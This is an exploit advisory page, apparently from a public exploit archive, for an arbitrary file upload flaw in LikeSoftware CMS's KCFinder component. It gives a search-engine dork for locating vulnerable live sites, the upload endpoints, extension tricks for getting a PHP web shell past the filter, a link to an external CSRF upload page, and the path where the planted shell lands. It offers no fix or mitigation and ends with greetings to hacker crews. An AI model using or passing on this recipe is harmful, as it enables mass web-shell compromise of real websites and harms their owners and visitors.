LikeSoftware CMS - Arbitrary File Upload

2018.05.24

Mr.7z (ID)

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: inurl:/painel/kcfinder/upload/ (For easy you can using Google Search Image)

# Exploit Title: LikeSoftware CMS - Arbitrary File Upload
# Google Dork: inurl:/painel/kcfinder/upload/ (For easy you can using Google Search Image)
# Date: 2018-05-24
# Exploit Author: Mr.7z
# Vendor Homepage: http://www.likesoftware.com.br/
# Software Link: -
# Tested on: Windows 10 64bit (Home Edition)
Exploit: /painel/kcfinder/browse.php or /painel/kcfinder/upload.php
ext shell: php.5 php,ndsxf php.pjpeg dll
You can Upload shell with CSRF Online -> http://dontpanic-its.me/kcfinder.php
Shell Locate: target.com/kcfinder/upload/files/shell.php
-Thx to XaiSyndicate - Family Attack Cyber - HunterSec-Team - Typical Idiot Security - Exilie's Team

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

LikeSoftware CMS - Arbitrary File Upload

Dork: inurl:/painel/kcfinder/upload/ (For easy you can using Google Search Image)

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.